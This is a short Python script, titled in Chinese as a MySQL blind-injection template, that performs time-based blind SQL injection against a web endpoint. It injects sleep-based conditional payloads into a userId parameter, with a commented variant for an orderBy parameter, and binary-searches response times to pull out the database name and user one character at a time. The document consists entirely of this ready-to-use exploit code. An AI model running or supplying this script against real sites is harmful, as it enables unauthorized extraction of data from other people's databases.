几次mysql盲注中抽出来的盲注模板
import requests
import time
time_conf = 1
results = ""
for i in range(1, 40):
min_char_index = 1 # 当前字符最小ASCII
large_char_index = 250 # 当前字符最大ASCII
fount = False
current_char = ""
print("当前判断位数 ", i)
while True: # 二分法
print("间距 ", min_char_index, large_char_index)
medium_char_index = int((min_char_index + large_char_index)/2) # ASCII值中位数
# 重复请求三次
running_time = 0
for _num in range(3): # 每个字符请求三次取均值,避免网络波动导致影响
url = f"https://example.com?userId=130" \
f"/**/or/**/1=1/**/and/**/" \
f"if((ascii(substr(database(),{i},1))%3e{medium_char_index}),sleep({time_conf}),1=2)" \
f"&phone=18888888888" # 该场景超过一秒后端的调用会中断,所以这个if最多只有一秒多
# url = f"https://example.com?pageNo=1&pageSize=5&orderBy=desc," \
# f"(select*from(select+sleep(" \
# f"if((ascii(substr(user(),{i},1))%3e{medium_char_index}),sleep({time_conf}),1)" \
# f")union/**/select+1)a)"
start_time = time.time()
rep = requests.get(url)
running_time += (time.time() - start_time)
running_time = running_time/3
if large_char_index - min_char_index == 1:
current_char = ""
if running_time >= time_conf:
current_char = chr(large_char_index)
else:
current_char = chr(min_char_index)
break
if running_time > time_conf: # 根据响应时间判断字符位于哪个二分区间
min_char_index = medium_char_index
else:
large_char_index = medium_char_index
print("字符=>", current_char, " ASCII=>", ord(current_char))
if ord(current_char) == 1 or ord(current_char) == 250:
break
results += current_char
print("当前结果=>", results)
print("结果=>", results)